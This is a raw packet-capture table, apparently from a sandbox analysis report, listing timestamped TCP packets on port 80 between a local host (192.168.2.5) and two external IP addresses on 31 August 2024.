Aug 31, 2024 15:44:21.156167984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156179905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156191111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156192064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156203985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156205893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156232119 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156303883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156677008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156687021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156697989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156716108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156725883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156737089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156747103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156748056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.156761885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156800985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156800985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.156955957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.157162905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160602093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160614014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160624981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160689116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160689116 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160706043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160717964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160727978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160748959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160765886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160774946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160778999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160778999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160787106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160798073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160808086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160835981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160839081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160851002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160861015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160861969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.160887003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.160957098 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162487030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162497997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162508011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162518024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162530899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162540913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162544966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162553072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162573099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162576914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162576914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162585974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162595987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162607908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162614107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162617922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162636042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162646055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162648916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162648916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162658930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.162686110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.162750959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.188962936 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.188976049 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.188992023 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.189054966 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.189685106 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.189697027 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.189707041 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.189713955 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.189732075 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.190824032 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.190845966 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.190855026 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.190856934 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.191303968 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.191315889 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.191327095 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.191334009 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.191378117 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.191378117 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.239121914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.239135027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.239222050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.239259005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.239269972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.239281893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.239296913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.239309072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.239312887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.239332914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.239372969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.240183115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240286112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240297079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240308046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240318060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240329027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240340948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240350008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.240350962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.240396976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.240396976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.240566015 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.240597010 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.240607023 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.240621090 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.240658998 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.240658998 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.241122961 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.241134882 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.241143942 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.241199017 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.241199017 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.241276026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241286993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241297960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241307974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241318941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241326094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241329908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241343021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241353035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241364956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241378069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241378069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241409063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241419077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241425991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241441011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241602898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241609097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241620064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241631031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241641998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241652966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241668940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241668940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241740942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241760015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241770983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241780043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241791964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241802931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241813898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241822004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241826057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241853952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241853952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.241894960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.241909981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.242011070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243010998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243057013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243067980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243114948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243120909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243133068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243149042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243149042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243160009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243171930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243175983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243182898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243201017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243222952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243233919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243242979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243246078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243257999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243275881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243288994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243299007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243309975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243314028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243319988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243331909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243344069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243350029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243350029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243355036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243367910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243377924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243381977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243390083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243416071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243422031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243422031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243449926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243490934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243597031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243684053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243788004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243798971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243810892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243820906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243833065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243844032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.243849993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243865967 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.243916035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.246781111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246804953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246838093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246848106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246859074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246861935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.246889114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.246928930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246949911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246954918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.246961117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.246973991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247003078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247034073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247056007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247068882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247086048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247114897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247179031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247246981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247261047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247385979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247445107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247456074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247585058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247591019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247596979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247675896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247677088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247687101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247698069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247708082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.247734070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247734070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.247844934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.252778053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252918959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252929926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252940893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252950907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252963066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252973080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252981901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.252985001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.252996922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.253017902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.253017902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.253067017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.253082037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.253093958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.253104925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.253106117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.253123045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.253159046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.253159046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.253252983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.253266096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.253315926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255104065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255115986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255125999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255172014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255204916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255239964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255251884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255266905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255279064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255342007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255342007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255542994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255623102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255634069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255656004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255677938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255688906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255700111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255707026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255707979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.255736113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.255903959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.290071964 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.290095091 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.290105104 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.290115118 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:21.290122986 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.290175915 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.290175915 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:21.329708099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329719067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329735994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329746008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329756975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329766035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329766035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.329776049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329787970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.329799891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.329818964 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.329828024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.331099033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331110001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331119061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331156015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.331176996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.331253052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331262112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331271887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331281900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331296921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.331321001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.331335068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.331952095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331960917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.331973076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332004070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332029104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332108021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332118034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332129955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332139015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332149029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332154036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332159042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:21.332161903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332175016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332185030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:21.332190037 CEST	49727	80	192.168.2.5	52.212.52.84
